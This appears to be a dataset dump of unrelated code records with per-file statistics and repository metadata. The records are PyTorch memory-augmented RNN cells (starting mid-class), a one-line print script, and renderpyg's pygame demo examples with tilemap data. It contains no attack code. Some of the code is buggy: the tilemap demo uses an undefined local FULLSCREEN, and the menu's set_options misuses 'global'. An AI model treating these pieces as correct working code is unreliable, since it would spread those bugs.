self.num_units = num_units
self.f_bias = f_bias
self.use_zoneout = use_zoneout
self.use_ln=use_ln
self.indrop=indrop
self.outdrop=outdrop
x_size=input_size
h_size=num_units
self.r_size=r_size=config.r_size
self.W_full = nn.Parameter(helper.orthogonal_initializer([x_size+r_size+h_size, 3 * h_size] , scale = 1.0))
self.bias = nn.Parameter(torch.zeros([3*h_size]))
self.W_full1 = nn.Parameter(helper.orthogonal_initializer([x_size+r_size+h_size, 2] , scale = 1.0))
self.bias1 = nn.Parameter(torch.zeros([2]))
self.W_full2 = nn.Parameter(helper.orthogonal_initializer([x_size+r_size+h_size, 1*h_size] , scale = 1.0))
self.bias2 = nn.Parameter(torch.zeros([1*h_size]))
self.memcnt=0
self.mem_cap=config.mem_cap
self.tau=1.
self.c_bias=nn.Parameter(torch.zeros(1,h_size))
self.h_bias=nn.Parameter(torch.zeros(1,h_size))
self.hmem_bias=nn.Parameter(torch.zeros(1,config.mem_cap,r_size))
self.keys= nn.Parameter(torch.zeros(config.mem_cap,config.key_size))
self.vec_a=nn.Parameter(torch.zeros(h_size//4,1))
nn.init.orthogonal_(self.keys)
nn.init.orthogonal_(self.vec_a)
self.fc=nn.Linear(x_size+r_size+h_size+config.key_size+config.mem_cap,h_size//4)
self.fc.weight.data=helper.orthogonal_initializer([self.fc.weight.shape[1],self.fc.weight.shape[0]]).t_()
torch.nn.init.constant_(self.fc.bias,0)
self.fc1=nn.Linear(h_size+x_size,r_size)
self.fc1.weight.data=helper.orthogonal_initializer([self.fc1.weight.shape[1],self.fc1.weight.shape[0]]).t_()
torch.nn.init.constant_(self.fc1.bias,0)
self.u_t=None
self.prev_read_location=None
def forward(self, x0):
h,c= self.recurrent_state
x=x0
h_size = self.num_units
x_size = self.input_size
h_read_head=torch.cat([torch.cat([x,c],dim=1).unsqueeze(1).expand(-1,self.mem_cap,-1),
self.keys.unsqueeze(0).expand(x.shape[0],-1,-1),
self.hmem,
torch.nn.functional.normalize(self.u_t,dim=1).unsqueeze(1).expand(-1,self.mem_cap,-1)],dim=2)
h_read_head=self.fc(h_read_head)
h_read_head=torch.bmm(torch.tanh(h_read_head),self.vec_a.unsqueeze(0).expand(x.shape[0],-1,-1)).squeeze(2)
h_read_head=h_read_head-self.prev_read_location*100
# added: normalize the read-head scores before sampling
h_read_head=torch.nn.functional.normalize(h_read_head,dim=1)
r,h_read_index=self.read(h_read_head,self.tau)
self.prev_read_location=h_read_index
self.u_t=self.u_t+h_read_index
new_h=torch.cat([h,r],dim=1)
concat0 = torch.cat((x,new_h), dim= 1)
concat1 = torch.mm(concat0,self.W_full) + self.bias
i,f,o = torch.split(concat1,h_size, dim=1)
alpha,beta=torch.split(self.gumbel_sigmoid(torch.mm(concat0,self.W_full1)+self.bias1,10/3),1,dim=1)
concat2= concat0
concat2= concat0 * torch.cat([torch.ones_like(x),torch.ones_like(h)*alpha,torch.ones_like(r)*beta],dim=1)
new_c=torch.tanh(torch.mm(concat2,self.W_full2)+self.bias2)
new_c = c * torch.sigmoid(f + self.f_bias) + torch.sigmoid(i) * new_c
new_h = torch.tanh(new_c) * torch.sigmoid(o)
if self.memcnt<self.mem_cap:
h_write_index=torch.cat([torch.zeros(self.memcnt),torch.ones(1),torch.zeros(self.mem_cap-1-self.memcnt)]).unsqueeze(0)
self.memcnt+=1
else:
h_write_index=h_read_index.detach()
self.write(self.fc1(torch.cat((x,new_h),dim=1)),h_write_index)
output=torch.cat([new_h,r],dim=1)
self.recurrent_state=(new_h,new_c)
return output
def zero_state(self, batch_size):
h = torch.zeros([batch_size, self.num_units])+torch.tanh(self.h_bias)
c = torch.zeros([batch_size, self.num_units])+torch.tanh(self.c_bias)
self.recurrent_state=(h, c)
def _reset_mem(self,batch_size):
self.memcnt=0
self.hmem=torch.zeros(batch_size,self.mem_cap,self.r_size)+self.hmem_bias
self.prev_read_location=torch.zeros(batch_size,self.mem_cap)
self.u_t=torch.zeros(batch_size,self.mem_cap)
def _reload_mem(self):
self.hmem=self.hmem.detach()
self.prev_read_location=self.prev_read_location.detach()
self.u_t=self.u_t.detach()
def set_tau(self,num):
self.tau=num
def write(self,h,h_index):
h_ones=h_index.unsqueeze(2)
self.hmem=h.unsqueeze(1)*h_ones+self.hmem*(1.-h_ones)
def read(self,h_read_head,tau):
h_index,_=self.gumbel_softmax(h_read_head,tau)
h_entry=h_index.unsqueeze(2)*self.hmem
h_entry=h_entry.sum(dim=1)
return h_entry,h_index
def gumbel_softmax(self,input, tau):
gumbel = -torch.log(1e-20-torch.log(1e-20+torch.rand(*input.shape)))
y=torch.nn.functional.softmax((input+gumbel)*tau,dim=1)
ymax,pos=y.max(dim=1)
hard_y=torch.eq(y,ymax.unsqueeze(1)).float()
y=(hard_y-y).detach()+y
return y,pos
def gumbel_sigmoid(self,input,tau):
gumbel = -torch.log(1e-20-torch.log(1e-20+torch.rand(*input.shape)))
y=torch.sigmoid((input+gumbel)*tau)
return y
class ARMIN_with_TARDIS_addr(nn.Module):
def __init__(self,config,input_size,num_units, use_zoneout=True,
use_ln=True,indrop=True,outdrop=True, f_bias = 1.):
super().__init__()
self.input_size=input_size
self.num_units = num_units
self.f_bias = f_bias
self.use_zoneout = use_zoneout
self.use_ln=use_ln
self.indrop=indrop
self.outdrop=outdrop
x_size=input_size
h_size=num_units
self.r_size=r_size=config.r_size
self.W_full = nn.Parameter(helper.orthogonal_initializer([x_size+r_size+h_size, r_size+4* h_size] , scale = 1.0))
self.bias = nn.Parameter(torch.zeros([r_size+4*h_size]))
self.W_full1 = nn.Parameter(helper.orthogonal_initializer([x_size+r_size+h_size, r_size+h_size] , scale = 1.0))
self.bias1 = nn.Parameter(torch.zeros([r_size+h_size]))
self.trans=nn.Linear(h_size+x_size,r_size)
torch.nn.init.orthogonal_(self.trans.weight)
torch.nn.init.constant_(self.trans.bias,0)
self.c_bias=nn.Parameter(torch.rand(1,num_units))
self.hmem_bias=nn.Parameter(torch.zeros(1,config.mem_cap,r_size))
self.memcnt=0
self.mem_cap=config.mem_cap
self.tau=1.
self.keys= nn.Parameter(torch.zeros(config.mem_cap,config.key_size))
self.vec_a=nn.Parameter(torch.zeros(h_size//4,1))
nn.init.orthogonal_(self.keys)
nn.init.xavier_uniform_(self.vec_a)
self.fc=nn.Linear(x_size+r_size+h_size+config.key_size+config.mem_cap,h_size//4)
self.fc.weight.data=helper.orthogonal_initializer([self.fc.weight.shape[1],self.fc.weight.shape[0]]).t_()
torch.nn.init.constant_(self.fc.bias,0)
self.u_t=None
self.prev_read_location=None
def forward(self, x0,state=None):
h,c= self.recurrent_state
x=x0
h_size = self.num_units
x_size = self.input_size
h_read_head=torch.cat([torch.cat([x,c],dim=1).unsqueeze(1).expand(-1,self.mem_cap,-1),
self.keys.unsqueeze(0).expand(x.shape[0],-1,-1),
self.hmem,
torch.nn.functional.normalize(self.u_t,dim=1).unsqueeze(1).expand(-1,self.mem_cap,-1)],dim=2)
h_read_head=self.fc(h_read_head).squeeze(2)
h_read_head=torch.bmm(torch.tanh(h_read_head),self.vec_a.unsqueeze(0).expand(x.shape[0],-1,-1)).squeeze(2)
h_read_head=h_read_head-self.prev_read_location*100
h_read_head=torch.nn.functional.normalize(h_read_head,dim=1)
h_entry,h_read_index=self.read(h_read_head,self.tau)
self.prev_read_location=h_read_index
self.u_t=self.u_t+h_read_index
new_c=torch.cat([c,h_entry],dim=1)
concat = torch.cat((x,new_c), dim= 1)
concat1=torch.mm(concat,self.W_full1) +self.bias1
concat1=torch.sigmoid(concat1)
concat1=torch.cat([torch.ones_like(x),concat1],dim=1)
concat = concat*concat1
concat = torch.mm(concat,self.W_full) + self.bias
i,j,f,o,om = torch.split(concat,h_size, dim=1)
new_c = c * torch.sigmoid(f + self.f_bias) + torch.sigmoid(i) * torch.tanh(j)
new_c=torch.tanh(new_c)
new_h = new_c * torch.sigmoid(o)
r = h_entry * torch.sigmoid(om)
if self.memcnt<self.mem_cap:
h_write_index=torch.cat([torch.zeros(self.memcnt),torch.ones(1),torch.zeros(self.mem_cap-1-self.memcnt)]).unsqueeze(0)
self.memcnt+=1
else:
h_write_index=h_read_index.detach()
self.write(self.trans(torch.cat((x,new_c),dim=1)),h_write_index)
new_r=torch.cat([new_h,r],dim=1)
self.recurrent_state=(new_h,new_c)
return new_r
def zero_state(self, batch_size):
h = torch.zeros([batch_size, self.num_units])
c = torch.zeros([batch_size, self.num_units])+torch.tanh(self.c_bias)
self.recurrent_state=(h,c)
def _reset_mem(self,batch_size):
self.memcnt=0
self.hmem=torch.zeros(batch_size,self.mem_cap,self.r_size)+self.hmem_bias
self.prev_read_location=torch.zeros(batch_size,self.mem_cap)
self.u_t=torch.zeros(batch_size,self.mem_cap)
def _reload_mem(self):
self.hmem=self.hmem.detach()
self.prev_read_location=self.prev_read_location.detach()
self.u_t=self.u_t.detach()
def set_tau(self,num):
self.tau=num
def write(self,h,h_index):
h_ones=h_index.unsqueeze(2)
self.hmem=h.unsqueeze(1)*h_ones+self.hmem*(1.-h_ones)
def read(self,h_read_head,tau):
h_index,_=self.gumbel_softmax(h_read_head,tau)
h_entry=h_index.unsqueeze(2)*self.hmem
h_entry=h_entry.sum(dim=1)
return h_entry,h_index
def gumbel_softmax(self,input, tau):
gumbel = -torch.log(1e-20-torch.log(1e-20+torch.rand(*input.shape)))
y=torch.nn.functional.softmax((input+gumbel)*tau,dim=1)
ymax,pos=y.max(dim=1)
hard_y=torch.eq(y,ymax.unsqueeze(1)).float()
y=(hard_y-y).detach()+y
return y,pos
| 38.148148 | 130 | 0.64249 | 2,829 | 17,510 | 3.733121 | 0.055143 | 0.038633 | 0.025566 | 0.033804 | 0.8984 | 0.880977 | 0.865448 | 0.859767 | 0.853612 | 0.821513 | 0 | 0.018705 | 0.218389 | 17,510 | 458 | 131 | 38.231441 | 0.752959 | 0.000343 | 0 | 0.771831 | 0 | 0 | 0.001886 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.098592 | false | 0 | 0.022535 | 0.002817 | 0.169014 | 0.002817 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
429fbfe9d1a7b818a67d9ad5ae1aab450a8b4208 | 33 | py | Python | codeup/1007.py | love-adela/algorithm | 4ccd02173c96f8369962f1fd4e5166a221690fa2 | [
"MIT"
] | 3 | 2019-03-09T05:19:23.000Z | 2019-04-06T09:26:36.000Z | codeup/1007.py | love-adela/algorithm | 4ccd02173c96f8369962f1fd4e5166a221690fa2 | [
"MIT"
] | 1 | 2020-02-23T10:38:04.000Z | 2020-02-23T10:38:04.000Z | codeup/1007.py | love-adela/algorithm | 4ccd02173c96f8369962f1fd4e5166a221690fa2 | [
"MIT"
] | 1 | 2019-05-22T13:47:53.000Z | 2019-05-22T13:47:53.000Z | print('"C:\Download\hello.cpp"')
| 16.5 | 32 | 0.666667 | 5 | 33 | 4.4 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.030303 | 33 | 1 | 33 | 33 | 0.6875 | 0 | 0 | 0 | 0 | 0 | 0.69697 | 0.69697 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 7 |
c41058625abae1d27d684f43c4ef9f485c686a9a | 38,741 | py | Python | renderpyg/examples.py | mcpalmer1980/renderpyg | 661205f372486968684c0be15596b8cb257607ce | [
"MIT"
] | 7 | 2020-12-20T08:02:39.000Z | 2021-03-31T14:36:36.000Z | renderpyg/examples.py | mcpalmer1980/renderpyg | 661205f372486968684c0be15596b8cb257607ce | [
"MIT"
] | null | null | null | renderpyg/examples.py | mcpalmer1980/renderpyg | 661205f372486968684c0be15596b8cb257607ce | [
"MIT"
] | 1 | 2020-12-19T21:41:19.000Z | 2020-12-19T21:41:19.000Z | '''
examples.py: A collection of examples for renderpyg
You can call this script with the name of an example to launch it.
Each example is a single function in this file, listed in the following order.
sprite
tfont
tilemap
nine
This file is part of renderpyg
renderpyg is a python package providing higher level features for
pygame. It uses the pygame._sdl2.video API to provide hardware GPU
texture rendering.
renderpyg is free software: you can redistribute it and/or modify
it under the terms of the GNU Lesser General Public License as
published by the Free Software Foundation, either version 3 of the
License, or (at your option) any later version.
renderpyg is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public
License along with renderpyg.
If not, see <http://www.gnu.org/licenses/>.
'''
import os, sys, random, math
import pygame as pg
from pygame._sdl2 import Window, Renderer, Texture, Image
import renderpyg as pyg
from renderpyg import Sprite, TextureFont, keyrange, load_texture
from random import randrange
# Set sdl2 for anisotropic filtering:
# (0 for no filtering, 1 for bilinear filtering, 2 for anisotropic)
os.environ['SDL_RENDER_SCALE_QUALITY'] = '2'
EXAMPLE_DATA = os.path.join(os.path.dirname(__file__), 'data', '')
RENDER_RESOLUTION = (1600, 900)
WINDOW_RESOLUTION = (1600, 900)
SMALL_RESOLUTION = (800, 450)
FRAMES_PER_SECOND = 30
FONT = EXAMPLE_DATA+'font.ttf'
FONT_SIZE = 72
SPRITE_COUNT = 30
FONT_PARAMS = dict(
text='Dancing Font', x=10, y=10, color=(175,0,0), variance=30,
circle=3, rotate=15, scale=.25, colors=(75,0,0))
EXAMPLES = dict(
sprites='animates alien sprites',
tilemap='scroll and zoom a garden',
tfont='select animated fonts from a list',
nine='scale nine patch images',
packed='animate frames from given TexturePacker xml',
menu='interact with a few example menus')
def sprites():
pg.init()
clock = pg.time.Clock()
window = Window("Renderpyg Example", size=WINDOW_RESOLUTION)
renderer = Renderer(window, vsync=True)
"""
We will draw into a buffer texture to allow easy resolution changes
It will also make it easier to apply screen transitions and similar effects later
When using pygame._sdl2.video you do not call pygame.display.set_mode()
Therefore calling surface.convert() or surface.convert_alpha() will throw an error
When you create a Texture that needs alpha blending you must set its blend mode
Alpha blending will be set automatically when loading from an image with transparency, such as PNG
Remember to use the buffer size instead of the window size when drawing onto the offscreen buffer
This will allow you to scale the screen to any window or fullscreen desktop size
"""
buffer = Texture(renderer, RENDER_RESOLUTION, target=True)
buffer.blend_mode = 1
screensize = buffer.get_rect()
"""
You can set fullscreen when creating the window by using Window(title, size, desktop_fullscreen=True)
I prefer creating a window before going to fullscreen to avoid strange window placement that occurs
if you exit fullscreen later on.
"""
FULLSCREEN = False
if FULLSCREEN:
window.set_fullscreen(True)
"""
Font features in pygame are designed for blitting to a surface, not for GPU rendering.
It is possible to create a streaming texture and then use texture.update() to update the texture
from a pygame surface, but accessing GPU memory is slow and this should be done sparingly.
Therefore I created a simple TextureFont class. We will use the animation feature of this class
for a little extra fun. We will also create some sprites and let them animate too.
Also, for this example we move and rotate individual sprites across the screen,
much as you would handle characters in a full game.
"""
tfont = TextureFont(renderer, FONT, FONT_SIZE)
sprite = Sprite((renderer, EXAMPLE_DATA+'texture.xml'))
group = pg.sprite.Group()
animations = [
keyrange(0, 7, 200),
keyrange(7, 14, 200),
keyrange(14, 21, 200),
keyrange(28, 35, 200)]
for _ in range(SPRITE_COUNT):
spr = Sprite(sprite.images)
spr.set_pos(
randrange(0, RENDER_RESOLUTION[0]),
randrange(0, RENDER_RESOLUTION[1]) )
spr.set_animation(random.choice(animations), -1)
spr.velocity = pg.Vector2(
randrange(-20, 20),
randrange(-20, 20))
if randrange(10) < 2:
spr.rotation = randrange(-10, 11)
group.add(spr)
"""
Here starts a simple game loop
Press SPACE to toggle between a large window, a small window, and fullscreen
Press ENTER to add more characters to the screen
At the beginning of each frame we must set the renderer target to our buffer Texture
All the following draw calls will be drawn to the buffer instead of the screen
After all of our drawing, we reset the target and draw the buffer onto the screen
"""
timer = pg.time.get_ticks()
delta = 0
running = True
while running:
renderer.target = buffer
for event in pg.event.get():
if event.type == pg.QUIT:
running = False
elif event.type == pg.KEYDOWN:
if event.key == pg.K_ESCAPE:
running = False
elif event.key == pg.K_SPACE:
if FULLSCREEN:
FULLSCREEN = False
window.size = WINDOW_RESOLUTION
window.set_windowed()
elif window.size == WINDOW_RESOLUTION:
window.size = SMALL_RESOLUTION
else:
FULLSCREEN = True
window.size = WINDOW_RESOLUTION
window.set_fullscreen(True)
#Must set the draw color before clearing the screen or drawing lines and rects
renderer.draw_color = (0,0,0,255)
renderer.clear()
"""
Draw the background image if available.
By default Texture.draw() will fill the renderer unless you supply a destination Rect
texture.draw( dstrect=Rect(x, y, width, height) )
"""
group.update(delta)
group.draw()
tfont.animate(**FONT_PARAMS)
# Setting renderer.target = None will make following draw calls render to the underlying window
# Since we don't provide a dstrect it will fill the renderer
renderer.target = None
buffer.draw()
renderer.present() # all draw calls occur and the screen is updated here
delta = clock.tick(FRAMES_PER_SECOND)
def tilemap():
from .tilemap import load_tilemap_string, load_tileset, render_tilemap, tile_background, Tilemap
pg.init()
window = Window('Testing', (1600,900))
renderer = Renderer(window)
clock = pg.time.Clock()
tfont = TextureFont(renderer, None, 48)
"""
We could load the tilemap and its images by loading the included
tmx file, but we'll load the tilemap from the map_data string and
the images from tile.png with load_tileset().
A pygame.Vector2 is used for the camera
"""
#tilemap = load_tmx(renderer, path+'tilemap.tmx')
loaded_map = load_tilemap_string(map_data)
loaded_cells = load_tileset(renderer, EXAMPLE_DATA+'tiles.png', 64,64)
tilemap = Tilemap(loaded_map, loaded_cells)
tilemap.update_tilemap(loaded_map, 0)
tilemap.add_layer(loaded_map)
background = load_texture(renderer, EXAMPLE_DATA+'grass.png')
camera = pg.Vector3(800,450,1)
scale = 1
texture = load_texture(renderer, EXAMPLE_DATA+'aliens.png')
group = pg.sprite.Group()
for _ in range(10):
spr = Sprite(texture, 7, 8, by_count=True)
spr.set_pos(
random.randint(0, tilemap.width * tilemap.tilewidth),
random.randint(0, tilemap.height * tilemap.tileheight))
spr.set_transform(camera)
group.add(spr)
delta = 0
running = True
while running:
for event in pg.event.get():
if event.type == pg.QUIT:
running = False
elif event.type == pg.KEYDOWN:
if event.key == pg.K_ESCAPE:
running = False
elif event.key == pg.K_SPACE:
if FULLSCREEN:
FULLSCREEN = False
window.size = WINDOW_RESOLUTION
window.set_windowed()
elif window.size == WINDOW_RESOLUTION:
window.size = SMALL_RESOLUTION
else:
FULLSCREEN = True
window.size = WINDOW_RESOLUTION
window.set_fullscreen(True)
elif event.type == pg.MOUSEMOTION:
x, y = pg.mouse.get_rel()
if pg.mouse.get_pressed()[0]:
camera.x -= x*2
camera.y -= y*2
elif event.type == pg.MOUSEBUTTONUP:
if event.button == 4:
scale += 0.01
elif event.button == 5:
scale -= 0.01
camera[2] = scale
render_tilemap(tilemap, camera, scale, center=True, clamp=True, background=background)
group.update(delta)
group.draw()
tfont.draw('Click and drag to scroll, wheel to zoom', 10, 10)
tfont.draw('Camera {} Scale: {:.1f}%'.format(camera, scale*100), 10, 60)
renderer.present()
renderer.draw_color = (0,0,0,255)
renderer.clear()
delta = clock.tick(FRAMES_PER_SECOND)
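The loop above passes `clamp=True` to `render_tilemap` so the view stays inside the map. A hypothetical helper (not renderpyg's actual implementation) sketches what that clamping amounts to: keep the camera center at least half a (scaled) viewport away from every edge.

```python
# Sketch of camera clamping: the visible window, sized view/scale,
# must stay inside a map of map_w x map_h pixels.
def clamp_camera(cam_x, cam_y, view_w, view_h, map_w, map_h, scale):
    half_w, half_h = view_w / (2 * scale), view_h / (2 * scale)
    cam_x = max(half_w, min(map_w - half_w, cam_x))
    cam_y = max(half_h, min(map_h - half_h, cam_y))
    return cam_x, cam_y

# a camera dragged past the top-left corner snaps back inside
```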
def tfont():
from .tfont import NinePatch
examples = {
'Radiantly Red': dict(color=(220,0,0), colors=(-100,0,0),
circle=3, zoom=5, duration=5000, rotate=25, variance=10),
'Blistering Blue': dict(color=(0,0,255), move=(8,0), fade=200,
spread=25, duration=200),
'Vividly Violet': dict(color=(238,130,238), colors=(-30,-30,-30),
move=(10,10), rotate=5, zoom=5, duration=3000),
'Garishly Green': dict(color=(0,100,0), colors=(0,-50,0), zoom=20,
duration=5000, variance=33),
'Whispy White': dict(color=(255,255,255), fade=100, circle=10,
variance=5, duration=9000)
}
example_list = list(examples.keys())
default = dict(color=(255,255,0), move=(5,2), rotate=4, duration=3000)
pg.init()
clock = pg.time.Clock()
window = Window("TextureFont Test", size=SMALL_RESOLUTION)
renderer = Renderer(window, vsync=True)
font = EXAMPLE_DATA+'font.ttf'
tfont = TextureFont(renderer, font, FONT_SIZE)
selected = 0
running = True
while running:
for event in pg.event.get():
if event.type == pg.QUIT:
running = False
elif event.type == pg.KEYDOWN:
if event.key == pg.K_UP:
selected -= 1
if selected < 0:
selected = len(examples) - 1
elif event.key == pg.K_DOWN:
selected += 1
if selected >= len(examples):
selected = 0
else:
running = False
renderer.draw_color = (0,0,0,255)
renderer.clear()
x = SMALL_RESOLUTION[0] // 2
y = 20
for i, item in enumerate(example_list):
if i==selected:
tfont.animate(
item, x, y, center=True, **examples[item])
else:
tfont.animate(item, x, y, center=True, **default)
y += tfont.height * 1.2
renderer.present()
clock.tick(30)
def nine():
from .tfont import NinePatch
pg.init()
clock = pg.time.Clock()
window = Window("NinePatch Test", size=RENDER_RESOLUTION)
renderer = Renderer(window, vsync=True)
screen_size = renderer.get_viewport()
tfont = TextureFont(renderer, EXAMPLE_DATA+'font.ttf', 64)
texture = load_texture(renderer, EXAMPLE_DATA+'nine.png')
patches = (
NinePatch(texture, (20, 20, 20, 20), (0, 0, 320, 167)),
NinePatch(texture, (52,52,52,52), (0, 168, 320, 173)),
NinePatch(texture, (32, 32, 32, 32), (0, 345, 320, 223)),
NinePatch(texture, (32, 32, 32, 32), (0, 572, 320, 160)))
selected = 0
running = True
while running:
for event in pg.event.get():
if event.type == pg.QUIT:
running = False
elif event.type == pg.KEYDOWN:
if event.key == pg.K_UP:
selected -= 1
if selected < 0:
selected = len(patches) - 1
elif event.key == pg.K_DOWN:
selected += 1
if selected >= len(patches):
selected = 0
else:
running = False
elif event.type == pg.MOUSEBUTTONDOWN:
selected += 1
if selected >= len(patches):
selected = 0
renderer.draw_color = (0,0,0,255)
renderer.clear()
x, y = pg.mouse.get_pos()
rect = pg.Rect(10, 10, x, y)
patches[selected].draw(rect)
center = max(rect.centerx, tfont.width('Move or click mouse') // 2)
tfont.draw('Move or click mouse', center, rect.centery, color=(255,0,0),
center = True, centery=True)
renderer.present()
clock.tick(30)
def packed(*args):
from .base import load_xml_images, scale_rect
if args:
filename = args[0]
else:
filename = EXAMPLE_DATA+'texture.xml'
pg.init()
clock = pg.time.Clock()
window = Window("TexturePacker Test", size=SMALL_RESOLUTION)
renderer = Renderer(window, vsync=True)
images = load_xml_images(renderer, filename)
dst = scale_rect(images[0].get_rect(), 2)
dst.center = renderer.get_viewport().center
for image in images:
image.draw(dstrect=dst)
renderer.present()
clock.tick(5)
renderer.clear()
pg.event.pump()
def menu():
from renderpyg import fetch_images, NinePatch, Menu, keyframes, keyrange
os.environ['SDL_RENDER_SCALE_QUALITY'] = '2'
EXAMPLE_DATA = os.path.join(os.path.dirname(__file__), 'data', '')
pg.init()
clock = pg.time.Clock()
window = Window("NinePatch Test", size=(900,600))
renderer = Renderer(window, vsync=True)
font, tfont = TextureFont.multi_font(renderer, (
(EXAMPLE_DATA+'font.ttf', 32),
(EXAMPLE_DATA+'font2.ttf', 32)))
texture = load_texture(renderer, EXAMPLE_DATA+'nine.png')
button = NinePatch(texture, (20,20,20,20), (0, 0, 320, 167))
dialog = NinePatch(texture, (32,32,32,32), (0,169, 320, 161))
box = NinePatch(texture, (22,24,22,24), (0, 332, 320, 106))
box_fill = NinePatch(texture, (22,24,22,24), (0, 439, 320, 106))
arrow_r, arrow_l, circle, bar = fetch_images(
texture, rects=(
(11, 559, 42, 42),
(11, 559, 42, 42),
(64, 547, 62, 62),
(373,225, 222, 18)))
arrow_l.flipX = True
spinner = Sprite((circle,), 0,0 )
spinner.set_animation(keyframes((0,), 500, rotation=60))
spinner.set_clock(clock)
alien = Sprite(
(renderer, EXAMPLE_DATA+'texture.xml'), 7, 8, by_count=True)
alien.set_animation(keyrange(0, 7, 200))
alien.set_clock(clock)
selection = ['button {}'.format(n) for n in range(29)]
good_sound = pg.mixer.Sound(EXAMPLE_DATA+'click.ogg')
bad_sound = pg.mixer.Sound(EXAMPLE_DATA+'cancel.ogg')
background = load_texture(renderer, EXAMPLE_DATA+'grass.png')
title = 'RenderPyg'
anim_light = dict(move=(2,0), rotate=7)
anim_heavy = dict(circle=2, rotate=15, variance=20, zoom=5)
joy = None
if pg.joystick.get_count() > 0:
js = pg.joystick.Joystick(0)
js.init()  # initialize before use; pack as (joystick, x_axis, y_axis)
joy = (js, 0, 1)
menu_basic = Menu(
renderer, font, clock=clock,
box=((255,255,255), (0,0,0), 4),
color=(150,150,150), label=(200,200,200),
sel_color=(255,255,255),
position = 6,
text_scale=.6,
)
menu_classic = Menu(
renderer, font, clock=clock,
sel_color=(255,255,255), sel_left=spinner,
color=(150,150,150), label=(200,200,200),
box=box, box_fill=circle,
text_scale=.6,
)
menu_spinner = Menu(
renderer, font, clock=clock, spacing=6,
patch=dialog, but_patch=button, but_padding=(30, 30),
sel_left=spinner,
opt_left=arrow_l, opt_right=arrow_r,
box=box, box_fill=box_fill, box_textc=(0,50,50),
text_font=tfont, text_scale =.5,
title_font=tfont, title_scale=1.25, title_color=(0,0,200)
)
menu_full = Menu(
renderer, font, clock=clock, spacing=6,
patch=dialog, but_patch=button, but_padding=(40, 15),
sel_patch=button,
opt_left=arrow_l, opt_right=arrow_r,
box=box, box_fill=box_fill, box_textc=(0,50,50),
text_font=tfont, text_scale =.4,
title_font=tfont, title_scale=1.25, title_color=(0,0,200)
)
menu = menu_spinner
menu.title_anim = anim_light
options = dict(
type=('blank', 'oldschool', 'spinner', 'full', ('menu: ','')),
back=('off', 'on', ('back: ','')),
lab1='text',
color=('white', 'red', 'blue'),
anim=('none', 'some', 'lots', ('anim: ', '')),
anim_speed={'type': 'SLIDER', 'label': 'speed', 'min': 1, 'max': 9, 'step': 1} )
def set_options():
global menu
new_menu = options['type']['value']
menu = {'blank': menu_basic,
'oldschool': menu_classic,
'spinner': menu_spinner,
'full': menu_full}[new_menu]
back = background if options['back']['value'] == 'on' else (0,0,0)
menu.set_background(back)
color = options['color']['value']
if color == 'red':
menu.color = (255,0,0)
menu.label = (150,0,0)
menu.sel_color = (0,0,255)
elif color == 'blue':
menu.color = (0,0,255)
menu.label = (0,0,150)
menu.sel_color = (255,0,0)
else:
menu.color = (150,150,150)
menu.label = (150,150,150)
menu.sel_color = (255,255,255)
anim, speed = options['anim']['value'], options['anim_speed']['value']
anim_light['duration'] = (7 - speed) * 1000
anim_heavy['duration'] = (7 - speed) * 1000
if anim == 'some':
menu.sel_anim = menu.title_anim = anim_light
menu.anim = menu.text_anim = None
elif anim == 'lots':
menu.sel_anim = menu.title_anim = anim_heavy
menu.anim = menu.text_anim = anim_light
else:
menu.sel_anim = menu.title_anim = None
menu.anim = menu.text_anim = None
return menu
running = True
while running:
if menu == menu_classic:
menu.position = random.choice((1, 6, 8))
result = menu.select(('list', 'dialog', 'input', 'options', 'quit'), title)[1]
if result == 'list':
menu.select(selection, None)
elif result == 'dialog':
menu.dialog(text_data, title, ('Okay',), 600)
elif result == 'input':
text, i, button = menu.input('New Title', ('Okay', 'Cancel'))
title = text if button == 'Okay' else title
elif result == 'options':
clicked, new = menu.options(options, title, buttons=('Okay', 'Cancel'))
if clicked == 'Okay':
options = new
menu = set_options()
else:
running = False
'''
# Here is how to use a modeless menu
menu.input('Type Me', buttons=('Okay', 'Cancel'), modeless=True)
while menu.alive:
# Do Your Work here
results = menu.handle()
renderer.present()
clock.tick(30)
print(results)
'''
text_data = """Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions."""
map_data = """
7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,
7,0,0,0,0,0,0,0,0,0,34,31,0,0,0,0,4,4,0,0,0,0,0,0,0,0,51,0,0,0,0,0,40,0,0,0,33,29,29,29,29,29,29,29,29,29,29,29,29,26,26,26,26,26,26,26,26,28,0,0,0,7,7,0,0,51,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,14,0,0,0,50,0,0,0,0,50,0,0,0,0,0,0,0,51,0,0,0,0,0,4,0,0,0,0,6,1,1,1,1,1,1,1,1,1,1,1,7,
